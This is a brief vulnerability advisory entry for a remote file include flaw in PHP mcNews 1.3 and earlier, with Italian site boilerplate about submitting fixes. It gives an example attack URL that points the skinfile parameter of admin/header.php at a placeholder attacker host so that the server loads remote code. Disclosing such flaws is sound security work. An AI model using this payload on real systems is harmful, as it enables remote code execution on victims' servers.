PHP mcNews <= 1.3 (skinfile) Remote File Include Vulnerability
2005-03-07 00:00:00Example:
if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/mcNews/admin/header.php?skinfile=http://[hacker_box]/
#
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.